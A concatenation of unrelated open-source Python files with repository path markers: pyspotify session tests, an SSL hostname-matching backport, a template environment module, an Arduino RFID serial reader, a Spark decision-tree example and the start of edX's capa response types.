session._sp_session, spotify.Bitrate.BITRATE_320k, 0)
def test_preferred_offline_bitrate_with_allow_resync(self, lib_mock):
lib_mock.sp_session_preferred_offline_bitrate.return_value = (
spotify.ErrorType.OK)
session = tests.create_real_session(lib_mock)
session.preferred_offline_bitrate(
spotify.Bitrate.BITRATE_320k, allow_resync=True)
lib_mock.sp_session_preferred_offline_bitrate.assert_called_with(
session._sp_session, spotify.Bitrate.BITRATE_320k, 1)
def test_preferred_offline_bitrate_fail_raises_error(self, lib_mock):
lib_mock.sp_session_preferred_offline_bitrate.return_value = (
spotify.ErrorType.INVALID_ARGUMENT)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.preferred_offline_bitrate(17)
def test_get_volume_normalization(self, lib_mock):
lib_mock.sp_session_get_volume_normalization.return_value = 0
session = tests.create_real_session(lib_mock)
result = session.volume_normalization
lib_mock.sp_session_get_volume_normalization.assert_called_with(
session._sp_session)
self.assertFalse(result)
def test_set_volume_normalization(self, lib_mock):
lib_mock.sp_session_set_volume_normalization.return_value = (
spotify.ErrorType.OK)
session = tests.create_real_session(lib_mock)
session.volume_normalization = True
lib_mock.sp_session_set_volume_normalization.assert_called_with(
session._sp_session, 1)
def test_set_volume_normalization_fail_raises_error(self, lib_mock):
lib_mock.sp_session_set_volume_normalization.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.volume_normalization = True
def test_process_events_returns_ms_to_next_timeout(self, lib_mock):
def func(sp_session, int_ptr):
int_ptr[0] = 5500
return spotify.ErrorType.OK
lib_mock.sp_session_process_events.side_effect = func
session = tests.create_real_session(lib_mock)
timeout = session.process_events()
self.assertEqual(timeout, 5500)
def test_process_events_fail_raises_error(self, lib_mock):
lib_mock.sp_session_process_events.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.process_events()
@mock.patch('spotify.InboxPostResult', spec=spotify.InboxPostResult)
def test_inbox_post_tracks(self, inbox_mock, lib_mock):
session = tests.create_real_session(lib_mock)
inbox_instance_mock = inbox_mock.return_value
result = session.inbox_post_tracks(
mock.sentinel.username, mock.sentinel.tracks,
mock.sentinel.message, mock.sentinel.callback)
inbox_mock.assert_called_with(
session, mock.sentinel.username, mock.sentinel.tracks,
mock.sentinel.message, mock.sentinel.callback)
self.assertEqual(result, inbox_instance_mock)
@mock.patch('spotify.playlist.lib', spec=spotify.lib)
def test_get_starred(self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_starred_for_user_create.return_value = (
spotify.ffi.cast('sp_playlist *', 42))
session = tests.create_real_session(lib_mock)
result = session.get_starred('alice')
lib_mock.sp_session_starred_for_user_create.assert_called_with(
session._sp_session, b'alice')
self.assertIsInstance(result, spotify.Playlist)
# Since we *created* the sp_playlist, we already have a refcount of 1
# and shouldn't increase the refcount when wrapping this sp_playlist in
# a Playlist object
self.assertEqual(playlist_lib_mock.sp_playlist_add_ref.call_count, 0)
@mock.patch('spotify.playlist.lib', spec=spotify.lib)
def test_get_starred_for_current_user(self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_starred_create.return_value = (
spotify.ffi.cast('sp_playlist *', 42))
session = tests.create_real_session(lib_mock)
result = session.get_starred()
lib_mock.sp_session_starred_create.assert_called_with(
session._sp_session)
self.assertIsInstance(result, spotify.Playlist)
# Since we *created* the sp_playlist, we already have a refcount of 1
# and shouldn't increase the refcount when wrapping this sp_playlist in
# a Playlist object
self.assertEqual(playlist_lib_mock.sp_playlist_add_ref.call_count, 0)
def test_get_starred_if_not_logged_in(self, lib_mock):
lib_mock.sp_session_starred_for_user_create.return_value = (
spotify.ffi.NULL)
session = tests.create_real_session(lib_mock)
result = session.get_starred('alice')
lib_mock.sp_session_starred_for_user_create.assert_called_with(
session._sp_session, b'alice')
self.assertIsNone(result)
@mock.patch('spotify.playlist_container.lib', spec=spotify.lib)
def test_get_published_playlists(self, playlist_lib_mock, lib_mock):
func_mock = lib_mock.sp_session_publishedcontainer_for_user_create
func_mock.return_value = spotify.ffi.cast('sp_playlistcontainer *', 42)
session = tests.create_real_session(lib_mock)
result = session.get_published_playlists('alice')
func_mock.assert_called_with(session._sp_session, b'alice')
self.assertIsInstance(result, spotify.PlaylistContainer)
# Since we *created* the sp_playlistcontainer, we already have a
# refcount of 1 and shouldn't increase the refcount when wrapping this
# sp_playlistcontainer in a PlaylistContainer object
self.assertEqual(
playlist_lib_mock.sp_playlistcontainer_add_ref.call_count, 0)
@mock.patch('spotify.playlist_container.lib', spec=spotify.lib)
def test_get_published_playlists_for_current_user(
self, playlist_lib_mock, lib_mock):
func_mock = lib_mock.sp_session_publishedcontainer_for_user_create
func_mock.return_value = spotify.ffi.cast('sp_playlistcontainer *', 42)
session = tests.create_real_session(lib_mock)
result = session.get_published_playlists()
func_mock.assert_called_with(session._sp_session, spotify.ffi.NULL)
self.assertIsInstance(result, spotify.PlaylistContainer)
def test_get_published_playlists_if_not_logged_in(self, lib_mock):
func_mock = lib_mock.sp_session_publishedcontainer_for_user_create
func_mock.return_value = spotify.ffi.NULL
session = tests.create_real_session(lib_mock)
result = session.get_published_playlists('alice')
func_mock.assert_called_with(session._sp_session, b'alice')
self.assertIsNone(result)
@mock.patch('spotify.Link')
def test_get_link(self, link_mock, lib_mock):
session = tests.create_real_session(lib_mock)
link_mock.return_value = mock.sentinel.link
result = session.get_link('spotify:any:foo')
self.assertIs(result, mock.sentinel.link)
link_mock.assert_called_with(session, uri='spotify:any:foo')
@mock.patch('spotify.Track')
def test_get_track(self, track_mock, lib_mock):
session = tests.create_real_session(lib_mock)
track_mock.return_value = mock.sentinel.track
result = session.get_track('spotify:track:foo')
self.assertIs(result, mock.sentinel.track)
track_mock.assert_called_with(session, uri='spotify:track:foo')
@mock.patch('spotify.Track')
def test_get_local_track(self, track_mock, lib_mock):
session = tests.create_real_session(lib_mock)
sp_track = spotify.ffi.cast('sp_track *', 42)
lib_mock.sp_localtrack_create.return_value = sp_track
track_mock.return_value = mock.sentinel.track
track = session.get_local_track(
artist='foo', title='bar', album='baz', length=210000)
self.assertEqual(track, mock.sentinel.track)
lib_mock.sp_localtrack_create.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY, 210000)
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][0]),
b'foo')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][1]),
b'bar')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][2]),
b'baz')
self.assertEqual(
lib_mock.sp_localtrack_create.call_args[0][3], 210000)
# Since we *created* the sp_track, we already have a refcount of 1 and
# shouldn't increase the refcount when wrapping this sp_track in a
# Track object
track_mock.assert_called_with(
session, sp_track=sp_track, add_ref=False)
@mock.patch('spotify.Track')
def test_get_local_track_with_defaults(self, track_mock, lib_mock):
session = tests.create_real_session(lib_mock)
sp_track = spotify.ffi.cast('sp_track *', 42)
lib_mock.sp_localtrack_create.return_value = sp_track
track_mock.return_value = mock.sentinel.track
track = session.get_local_track()
self.assertEqual(track, mock.sentinel.track)
lib_mock.sp_localtrack_create.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY, -1)
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][0]),
b'')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][1]),
b'')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][2]),
b'')
self.assertEqual(
lib_mock.sp_localtrack_create.call_args[0][3], -1)
# Since we *created* the sp_track, we already have a refcount of 1 and
# shouldn't increase the refcount when wrapping this sp_track in a
# Track object
track_mock.assert_called_with(
session, sp_track=sp_track, add_ref=False)
@mock.patch('spotify.Album')
def test_get_album(self, album_mock, lib_mock):
session = tests.create_real_session(lib_mock)
album_mock.return_value = mock.sentinel.album
result = session.get_album('spotify:album:foo')
self.assertIs(result, mock.sentinel.album)
album_mock.assert_called_with(session, uri='spotify:album:foo')
@mock.patch('spotify.Artist')
def test_get_artist(self, artist_mock, lib_mock):
session = tests.create_real_session(lib_mock)
artist_mock.return_value = mock.sentinel.artist
result = session.get_artist('spotify:artist:foo')
self.assertIs(result, mock.sentinel.artist)
artist_mock.assert_called_with(session, uri='spotify:artist:foo')
@mock.patch('spotify.Playlist')
def test_get_playlist(self, playlist_mock, lib_mock):
session = tests.create_real_session(lib_mock)
playlist_mock.return_value = mock.sentinel.playlist
result = session.get_playlist('spotify:playlist:foo')
self.assertIs(result, mock.sentinel.playlist)
playlist_mock.assert_called_with(session, uri='spotify:playlist:foo')
@mock.patch('spotify.User')
def test_get_user(self, user_mock, lib_mock):
session = tests.create_real_session(lib_mock)
user_mock.return_value = mock.sentinel.user
result = session.get_user('spotify:user:foo')
self.assertIs(result, mock.sentinel.user)
user_mock.assert_called_with(session, uri='spotify:user:foo')
@mock.patch('spotify.Image')
def test_get_image(self, image_mock, lib_mock):
session = tests.create_real_session(lib_mock)
callback = mock.Mock()
image_mock.return_value = mock.sentinel.image
result = session.get_image('spotify:image:foo', callback=callback)
self.assertIs(result, mock.sentinel.image)
image_mock.assert_called_with(
session, uri='spotify:image:foo', callback=callback)
@mock.patch('spotify.Search')
def test_search(self, search_mock, lib_mock):
session = tests.create_real_session(lib_mock)
search_mock.return_value = mock.sentinel.search
result = session.search('alice')
self.assertIs(result, mock.sentinel.search)
search_mock.assert_called_with(
session, query='alice', callback=None,
track_offset=0, track_count=20,
album_offset=0, album_count=20,
artist_offset=0, artist_count=20,
playlist_offset=0, playlist_count=20,
search_type=None)
@mock.patch('spotify.Toplist')
def test_toplist(self, toplist_mock, lib_mock):
session = tests.create_real_session(lib_mock)
toplist_mock.return_value = mock.sentinel.toplist
result = session.get_toplist(
type=spotify.ToplistType.TRACKS, region='NO')
self.assertIs(result, mock.sentinel.toplist)
toplist_mock.assert_called_with(
session, type=spotify.ToplistType.TRACKS, region='NO',
canonical_username=None, callback=None)
@mock.patch('spotify.session.lib', spec=spotify.lib)
class SessionCallbacksTest(unittest.TestCase):
def tearDown(self):
spotify._session_instance = None
def test_logged_in_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.LOGGED_IN, callback)
_SessionCallbacks.logged_in(
session._sp_session, int(spotify.ErrorType.BAD_API_VERSION))
callback.assert_called_once_with(
session, spotify.ErrorType.BAD_API_VERSION)
def test_logged_out_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.LOGGED_OUT, callback)
_SessionCallbacks.logged_out(session._sp_session)
callback.assert_called_once_with(session)
def test_metadata_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.METADATA_UPDATED, callback)
_SessionCallbacks.metadata_updated(session._sp_session)
callback.assert_called_once_with(session)
def test_connection_error_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.CONNECTION_ERROR, callback)
_SessionCallbacks.connection_error(
session._sp_session, int(spotify.ErrorType.OK))
callback.assert_called_once_with(session, spotify.ErrorType.OK)
def test_message_to_user_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.MESSAGE_TO_USER, callback)
data = spotify.ffi.new('char[]', b'a log message\n')
_SessionCallbacks.message_to_user(session._sp_session, data)
callback.assert_called_once_with(session, 'a log message')
def test_notify_main_thread_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.NOTIFY_MAIN_THREAD, callback)
_SessionCallbacks.notify_main_thread(session._sp_session)
callback.assert_called_once_with(session)
def test_music_delivery_callback(self, lib_mock):
sp_audioformat = spotify.ffi.new('sp_audioformat *')
sp_audioformat.channels = 2
audio_format = spotify.AudioFormat(sp_audioformat)
num_frames = 10
frames_size = audio_format.frame_size() * num_frames
frames = spotify.ffi.new('char[]', frames_size)
frames[0:3] = [b'a', b'b', b'c']
frames_void_ptr = spotify.ffi.cast('void *', frames)
callback = mock.Mock()
callback.return_value = num_frames
session = tests.create_real_session(lib_mock)
session.on('music_delivery', callback)
result = _SessionCallbacks.music_delivery(
session._sp_session, sp_audioformat, frames_void_ptr, num_frames)
callback.assert_called_once_with(
session, mock.ANY, mock.ANY, num_frames)
self.assertEqual(
callback.call_args[0][1]._sp_audioformat, sp_audioformat)
self.assertEqual(callback.call_args[0][2][:5], b'abc\x00\x00')
self.assertEqual(result, num_frames)
def test_music_delivery_without_callback_does_not_consume(self, lib_mock):
session = tests.create_real_session(lib_mock)
sp_audioformat = spotify.ffi.new('sp_audioformat *')
num_frames = 10
frames = spotify.ffi.new('char[]', 0)
frames_void_ptr = spotify.ffi.cast('void *', frames)
result = _SessionCallbacks.music_delivery(
session._sp_session, sp_audioformat, frames_void_ptr, num_frames)
self.assertEqual(result, 0)
def test_play_token_lost_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.PLAY_TOKEN_LOST, callback)
_SessionCallbacks.play_token_lost(session._sp_session)
callback.assert_called_once_with(session)
def test_log_message_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.LOG_MESSAGE, callback)
data = spotify.ffi.new('char[]', b'a log message\n')
_SessionCallbacks.log_message(session._sp_session, data)
callback.assert_called_once_with(session, 'a log message')
def test_end_of_track_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.END_OF_TRACK, callback)
_SessionCallbacks.end_of_track(session._sp_session)
callback.assert_called_once_with(session)
def test_streaming_error_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.STREAMING_ERROR, callback)
_SessionCallbacks.streaming_error(
session._sp_session, int(spotify.ErrorType.NO_STREAM_AVAILABLE))
callback.assert_called_once_with(
session, spotify.ErrorType.NO_STREAM_AVAILABLE)
def test_user_info_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.USER_INFO_UPDATED, callback)
_SessionCallbacks.user_info_updated(session._sp_session)
callback.assert_called_once_with(session)
def test_start_playback_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.START_PLAYBACK, callback)
_SessionCallbacks.start_playback(session._sp_session)
callback.assert_called_once_with(session)
def test_stop_playback_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.STOP_PLAYBACK, callback)
_SessionCallbacks.stop_playback(session._sp_session)
callback.assert_called_once_with(session)
def test_get_audio_buffer_stats_callback(self, lib_mock):
callback = mock.Mock()
callback.return_value = spotify.AudioBufferStats(100, 5)
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.GET_AUDIO_BUFFER_STATS, callback)
sp_audio_buffer_stats = spotify.ffi.new('sp_audio_buffer_stats *')
_SessionCallbacks.get_audio_buffer_stats(
session._sp_session, sp_audio_buffer_stats)
callback.assert_called_once_with(session)
self.assertEqual(sp_audio_buffer_stats.samples, 100)
self.assertEqual(sp_audio_buffer_stats.stutter, 5)
def test_offline_status_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.OFFLINE_STATUS_UPDATED, callback)
_SessionCallbacks.offline_status_updated(session._sp_session)
callback.assert_called_once_with(session)
def test_credentials_blob_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.CREDENTIALS_BLOB_UPDATED, callback)
data = spotify.ffi.new('char[]', b'a credentials blob')
_SessionCallbacks.credentials_blob_updated(
session._sp_session, data)
callback.assert_called_once_with(session, b'a credentials blob')
def test_connection_state_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.CONNECTION_STATE_UPDATED, callback)
_SessionCallbacks.connection_state_updated(session._sp_session)
callback.assert_called_once_with(session)
def test_scrobble_error_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.SCROBBLE_ERROR, callback)
_SessionCallbacks.scrobble_error(
session._sp_session, int(spotify.ErrorType.LASTFM_AUTH_ERROR))
callback.assert_called_once_with(
session, spotify.ErrorType.LASTFM_AUTH_ERROR)
def test_private_session_mode_changed_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.PRIVATE_SESSION_MODE_CHANGED, callback)
_SessionCallbacks.private_session_mode_changed(
session._sp_session, 1)
callback.assert_called_once_with(session, True)
|
jmptrader/rethinkdb
|
refs/heads/next
|
drivers/python/rethinkdb/backports/ssl_match_hostname/__init__.py
|
134
|
"""The match_hostname() function from Python 3.3.3, essential when using SSL."""
import re
__version__ = '3.4.0.2'
class CertificateError(ValueError):
pass
def _dnsname_match(dn, hostname, max_wildcards=1):
"""Matching according to RFC 6125, section 6.4.3
http://tools.ietf.org/html/rfc6125#section-6.4.3
"""
pats = []
if not dn:
return False
# Ported from python3-syntax:
# leftmost, *remainder = dn.split(r'.')
parts = dn.split(r'.')
leftmost = parts[0]
remainder = parts[1:]
wildcards = leftmost.count('*')
if wildcards > max_wildcards:
# Issue #17980: avoid denials of service by refusing more
# than one wildcard per fragment. A survey of established
# policy among SSL implementations showed it to be a
# reasonable choice.
raise CertificateError(
"too many wildcards in certificate DNS name: " + repr(dn))
# speed up common case w/o wildcards
if not wildcards:
return dn.lower() == hostname.lower()
# RFC 6125, section 6.4.3, subitem 1.
# The client SHOULD NOT attempt to match a presented identifier in which
# the wildcard character comprises a label other than the left-most label.
if leftmost == '*':
# When '*' is a fragment by itself, it matches a non-empty dotless
# fragment.
pats.append('[^.]+')
elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
# RFC 6125, section 6.4.3, subitem 3.
# The client SHOULD NOT attempt to match a presented identifier
# where the wildcard character is embedded within an A-label or
# U-label of an internationalized domain name.
pats.append(re.escape(leftmost))
else:
# Otherwise, '*' matches any dotless string, e.g. www*
pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
# add the remaining fragments, ignore any wildcards
for frag in remainder:
pats.append(re.escape(frag))
pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
return pat.match(hostname)
def match_hostname(cert, hostname):
"""Verify that *cert* (in decoded format as returned by
SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125
rules are followed, but IP addresses are not accepted for *hostname*.
CertificateError is raised on failure. On success, the function
returns nothing.
"""
if not cert:
raise ValueError("empty or no certificate")
dnsnames = []
san = cert.get('subjectAltName', ())
for key, value in san:
if key == 'DNS':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if not dnsnames:
# The subject is only checked when there is no dNSName entry
# in subjectAltName
for sub in cert.get('subject', ()):
for key, value in sub:
# XXX according to RFC 2818, the most specific Common Name
# must be used.
if key == 'commonName':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if len(dnsnames) > 1:
raise CertificateError("hostname %r "
"doesn't match either of %s"
% (hostname, ', '.join(map(repr, dnsnames))))
elif len(dnsnames) == 1:
raise CertificateError("hostname %r "
"doesn't match %r"
% (hostname, dnsnames[0]))
else:
raise CertificateError("no appropriate commonName or "
"subjectAltName fields were found")
|
vivsh/kaya
|
refs/heads/master
|
src/kaya/env.py
|
1
|
try:
    from collections.abc import Sequence
except ImportError:  # Python 2 fallback
    from collections import Sequence
import os
import six
from six.moves.urllib import parse
import threading
from .assets import AssetManager
from .exceptions import TemplateNotFound, InvalidTag
try:
from lxml import etree as ET
except ImportError:
try:
from xml.etree import cElementTree as ET
except ImportError:
from xml.etree import ElementTree as ET
from werkzeug.utils import find_modules, import_string
class Config(object):
def __init__(self, kwargs):
self.data = {
"base_dir": os.getcwd(),
"static_url": "static/",
"static_dirs": [os.path.join(os.path.dirname(__file__), "static")],
"port": 8000,
"host": "127.0.0.1"
}
values = kwargs
for key in values:
method = "clean_%s" % key
try:
func = getattr(self, method)
except AttributeError:
if key in self.data:
self.data[key] = values[key]
else:
raise KeyError("%r is not a valid configuration key" % key)
else:
self.data[key] = func(values[key])
def abspath(self, *args):
return os.path.join(self.base_dir, *args)
    def clean_static_dirs(self, value):
dirs = []
if not isinstance(value, (tuple, list)):
value = [value]
for val in value:
path = self.abspath(val)
if os.path.isdir(path):
dirs.append(path)
return dirs
def clean_static_url(self, value):
value = value.strip("/") + "/"
return value
def clean_port(self, value):
return int(value)
def clean_host(self, value):
return value
def dict(self):
return self.data.copy()
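# Hedged illustration of the clean_<key> dispatch in Config.__init__ above
# (values are hypothetical): Config({"port": "8080"}).dict()["port"] == 8080
# because clean_port coerces the string, while an unrecognized key such as
# "foo" raises KeyError.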
class Environment(object):
def __init__(self, **kwargs):
self.local = threading.local()
conf = Config(kwargs).dict()
self.base_dir = conf["base_dir"]
self.static_url = conf["static_url"]
self.static_dirs = conf["static_dirs"]
self.port = conf["port"]
self.host = conf["host"]
self.elements = {}
self.load_elements()
def load_modules(self):
for pkg in ("kaya.tags", ):
mods = find_modules(pkg)
for m in mods:
import_string(m, True)
def load_elements(self):
from kaya.tags.base import Element
self.elements.clear()
self.load_modules()
store = Element.__subclasses__()
while store:
cls = store.pop(0)
store.extend(cls.__subclasses__())
name = cls.__name__.lower()
if not name.startswith("_") and not cls.abstract:
self.elements[name] = cls
def abspath(self, path_name):
return os.path.join(self.base_dir, path_name)
def get_template_path(self, name):
path = self.abspath(name)
return path
def is_tag(self, node):
return isinstance(node.tag, six.string_types)
def get_xml_root(self, path_name):
path = self.get_template_path(path_name)
return ET.parse(path).getroot()
def get_html(self, path_name, pretty_print=False):
try:
tree = self.get_xml_root(path_name)
except (OSError, IOError):
raise TemplateNotFound(path_name)
ctx = Context(self, tree, path_name)
content = ctx.render()
if pretty_print:
try:
return ET.tostring(ET.fromstring(content), pretty_print=True, method="html", encoding="unicode")
except TypeError:
raise TypeError("pretty_print option is supported only when lxml is installed")
return content
@staticmethod
def make_node(tag, attrib):
return ET.Element(tag, attrib)
def make_static_url(self, path):
return parse.urljoin(self.static_url, path)
def find_static(self, name):
name = name.strip("/")
for dir_ in self.static_dirs:
filename = os.path.join(dir_, name)
if os.path.isfile(filename):
return filename
class Context(object):
def __init__(self, env, root, path_name):
self.env = env
self.root = root
self.path_name = path_name
self.deps = set()
def get_asset_tags(self):
mgr = AssetManager(self.deps, self)
return mgr.get_tags()
def find_node(self, id, node=None):
for parent, child in self.iter_nodes(node):
if id == child.get("id"):
return child
def iter_nodes(self, node=None):
if node is None:
node = self.root
store = [(node, c) for c in node]
while store:
parent, child = store.pop(0)
yield parent, child
for c in child:
store.append((child, c))
@staticmethod
def replace_node(parent, child, node):
index = list(parent).index(child)
parent.remove(child)
parent.insert(index, node)
def is_tag(self, node):
return self.env.is_tag(node)
def get_xml_root(self, path):
return self.env.get_xml_root(path)
def get_element_class(self, node):
return self.env.elements[node.tag]
def make_element(self, node):
try:
return self.get_element_class(node)(node, self)
except KeyError:
raise InvalidTag(node, "Invalid tag")
def make_node(self, *args, **kwargs):
return self.env.make_node(*args, **kwargs)
def require(self, *packages):
for package in packages:
if not isinstance(package, Sequence):
package = [package]
for p in package:
self.deps.add(p)
def render(self):
el = self.make_element(self.root)
return el.render()
def find_static(self, *args, **kwargs):
return self.env.find_static(*args, **kwargs)
def make_static_url(self, *args, **kwargs):
return self.env.make_static_url(*args, **kwargs)
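# Hedged usage sketch (paths and values are illustrative):
#   env = Environment(base_dir="/srv/site", static_url="assets/")
#   html = env.get_html("templates/index.xml")
# get_html() parses the template into an ElementTree, and Context.render()
# dispatches each tag to its registered Element subclass to produce HTML.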
|
Labas-Vakaras/Smart_City
|
refs/heads/master
|
rfid-arduino/ComArduino.py
|
1
|
#======================================
import serial
import time
import webbrowser
print
print
# NOTE the user must ensure that the serial port and baudrate are correct
serPort = "/dev/ttyAMC0"
baudRate = 9600
ser = serial.Serial("/dev/serial/by-id/usb-Arduino__www.arduino.cc__0043_64032373933351B070D0-if00", baudRate, timeout=3.0)
print "Serial port " + serPort + " opened Baudrate " + str(baudRate)
while True:
    line = ser.readline().strip()  # strip the trailing newline before using it
    if line != "":
        print line
        webbrowser.open('http://155.254.33.123:8082/item/report?id=' + line, new=2)
break
ser.close()
|
srowen/spark
|
refs/heads/master
|
examples/src/main/python/mllib/decision_tree_regression_example.py
|
27
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Decision Tree Regression Example.
"""
from pyspark import SparkContext
# $example on$
from pyspark.mllib.tree import DecisionTree, DecisionTreeModel
from pyspark.mllib.util import MLUtils
# $example off$
if __name__ == "__main__":
sc = SparkContext(appName="PythonDecisionTreeRegressionExample")
# $example on$
# Load and parse the data file into an RDD of LabeledPoint.
data = MLUtils.loadLibSVMFile(sc, 'data/mllib/sample_libsvm_data.txt')
# Split the data into training and test sets (30% held out for testing)
(trainingData, testData) = data.randomSplit([0.7, 0.3])
# Train a DecisionTree model.
# Empty categoricalFeaturesInfo indicates all features are continuous.
model = DecisionTree.trainRegressor(trainingData, categoricalFeaturesInfo={},
impurity='variance', maxDepth=5, maxBins=32)
# Evaluate model on test instances and compute test error
predictions = model.predict(testData.map(lambda x: x.features))
labelsAndPredictions = testData.map(lambda lp: lp.label).zip(predictions)
testMSE = labelsAndPredictions.map(lambda lp: (lp[0] - lp[1]) * (lp[0] - lp[1])).sum() /\
float(testData.count())
print('Test Mean Squared Error = ' + str(testMSE))
print('Learned regression tree model:')
print(model.toDebugString())
# Save and load model
model.save(sc, "target/tmp/myDecisionTreeRegressionModel")
sameModel = DecisionTreeModel.load(sc, "target/tmp/myDecisionTreeRegressionModel")
# $example off$
|
antonve/s4-project-mooc
|
refs/heads/master
|
common/lib/capa/capa/responsetypes.py
|
17
|
#
# File: courseware/capa/responsetypes.py
#
"""
Problem response evaluation. Handles checking of student responses,
of a variety of types.
Used by capa_problem.py
"""
# standard library imports
import abc
import cgi
import inspect
import json
import logging
import html5lib
import numbers
import numpy
import os
from pyparsing import ParseException
import sys
import random
import re
import requests
import subprocess
import textwrap
import traceback
import xml.sax.saxutils as saxutils
from cmath import isnan
from sys import float_info
from collections import namedtuple
from shapely.geometry import Point, MultiPoint
import dogstats_wrapper as dog_stats_api
# specific library imports
from calc import evaluator, UndefinedVariable
from . import correctmap
from .registry import TagRegistry
from datetime import datetime
from pytz import UTC
from .util import (
compare_with_tolerance, contextualize_text, convert_files_to_filenames,
is_list_of_files, find_with_default, default_tolerance
)
from lxml import etree
from lxml.html.soupparser import fromstring as fromstring_bs # uses Beautiful Soup!!! FIXME?
import capa.xqueue_interface as xqueue_interface
import capa.safe_exec as safe_exec
log = logging.getLogger(__name__)
registry = TagRegistry()
CorrectMap = correctmap.CorrectMap # pylint: disable=invalid-name
CORRECTMAP_PY = None
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
#-----------------------------------------------------------------------------
# Exceptions
class LoncapaProblemError(Exception):
"""
Error in specification of a problem
"""
pass
class ResponseError(Exception):
"""
Error for failure in processing a response, including
exceptions that occur when executing a custom script.
"""
pass
class StudentInputError(Exception):
"""
Error for an invalid student input.
For example, submitting a string when the problem expects a number
"""
pass
#-----------------------------------------------------------------------------
#
# Main base class for CAPA responsetypes
class LoncapaResponse(object):
"""
    Base class for CAPA responsetypes. Each response type (i.e. a capa question,
which is part of a capa problem) is represented as a subclass,
which should provide the following methods:
- get_score : evaluate the given student answers, and return a CorrectMap
- get_answers : provide a dict of the expected answers for this problem
Each subclass must also define the following attributes:
- tags : xhtml tags identifying this response (used in auto-registering)
In addition, these methods are optional:
- setup_response : find and note the answer input field IDs for the response; called
by __init__
- check_hint_condition : check to see if the student's answers satisfy a particular
condition for a hint to be displayed
- render_html : render this Response as HTML (must return XHTML-compliant string)
- __unicode__ : unicode representation of this Response
Each response type may also specify the following attributes:
- max_inputfields : (int) maximum number of answer input fields (checked in __init__
if not None)
- allowed_inputfields : list of allowed input fields (each a string) for this Response
- required_attributes : list of required attributes (each a string) on the main
response XML stanza
- hint_tag : xhtml tag identifying hint associated with this response inside
hintgroup
"""
__metaclass__ = abc.ABCMeta # abc = Abstract Base Class
tags = None
hint_tag = None
max_inputfields = None
allowed_inputfields = []
required_attributes = []
def __init__(self, xml, inputfields, context, system):
"""
Init is passed the following arguments:
- xml : ElementTree of this Response
- inputfields : ordered list of ElementTrees for each input entry field in this Response
- context : script processor context
- system : LoncapaSystem instance which provides OS, rendering, and user context
"""
self.xml = xml
self.inputfields = inputfields
self.context = context
self.capa_system = system
self.id = xml.get('id')
# The LoncapaProblemError messages here do not need to be translated as they are
# only displayed to the user when settings.DEBUG is True
for abox in inputfields:
if abox.tag not in self.allowed_inputfields:
msg = "%s: cannot have input field %s" % (
unicode(self), abox.tag)
msg += "\nSee XML source line %s" % getattr(
xml, 'sourceline', '<unavailable>')
raise LoncapaProblemError(msg)
